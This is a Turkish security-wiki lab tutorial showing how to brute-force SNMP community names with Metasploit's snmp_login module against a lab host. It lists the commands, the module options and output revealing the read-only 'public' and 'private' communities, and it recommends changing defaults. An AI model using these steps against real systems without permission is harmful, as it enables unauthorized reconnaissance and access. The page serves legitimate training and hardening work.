SNMP Community Name Brute Force Denemeleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

SNMP protokolünden bilgi almak için community name’in kaba kuvvet yöntemi ile tespit edilmesi.

Araç:

  • metasploit(snmp_login)

Lab Senaryosu:

SNMP “community name” bilgisinin elde edilmesi ile hedef sistem hakkında bilgi alınması mümkündür. Bu yüzden sistemlerin SNMP “community name” değerlerinin ön tanımlı olarak bırakılmaması önerilmektedir.

Adımlar:

1. Adım: Metasploit Framework başlatılır;

root@bt:~/Desktop# msfconsole
msf >

2. Adım: İlgili modül seçilir;

use auxiliary/scanner/snmp/snmp_login

3. Adım: Modülün alabileceği parametreler gözlenir;

show options

Module options (auxiliary/scanner/snmp/snmp_login):

  Name          	Current Setting            Required  Description
  ----          	---------------             --------  -----------
  BATCHSIZE     	256                           yes   	The number of hosts to probe in each set
  BLANK_PASSWORDS     false                        no    	Try blank passwords for all users
  BRUTEFORCE_SPEED    5                             yes   	How fast to bruteforce, from 0 to 5
  CHOST                                                    no    	The local client address
  DB_ALL_CREDS  	false                          no    	Try each user/password couple stored in the current database
  DB_ALL_PASS   	false                          no    	Add all passwords in the current database to the list
  DB_ALL_USERS  	false                           no    	Add all users in the current database to the list
  PASSWORD                                            no    	The password to test
  PASS_FILE    /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
  RHOSTS                                                  yes   	The target address range or CIDR identifier
  RPORT         	161                                     yes   	The target port
  STOP_ON_SUCCESS   false                   yes   	Stop guessing when a credential works for a host
  THREADS       	1                                   yes   	The number of concurrent threads
  USER_AS_PASS  	false                            no    	Try the username as the password for all users
  VERBOSE       	true                            yes   	Whether to print output for all attempts

4. Adım: Hedef sistem bilgileri girilerek sisteme SNMP sorguları gönderilir. Sadece RHOST değerinin girilmesi yeterli olacaktır.

msf auxiliary(snmp_login) > set RHOSTS 1.1.1.100
RHOSTS => 1.1.1.100

5. Adım: Zafiyet testinin gerçekleştirilmesi;

msf auxiliary(snmp_login) > exploit

[+] 1.1.1.100:161 - LOGIN SUCCESSFUL: public: (Access level: read-only)
[+] 1.1.1.100:161 - LOGIN SUCCESSFUL: private: (Access level: read-only)
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 0: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 0392a0: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 1234: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 2read: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 4changes: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: ANYCOM: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: Admin: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: C0de: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: CISCO: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: CR52401: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: IBM: (Incorrect: )
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed

Elde edilen çıktılardan sadece bir kısmı verilmiştir, görüldüğü üzere hedef sistem üzerinde var olan “community name” değerleri “LOGIN SUCCESSFUL” ibaresi ile gösterilmiştir ve yine çıktıdan anlaşılacağı üzere sistem üzerinde bu değerler ile yazma hakları bulunmamaktadır.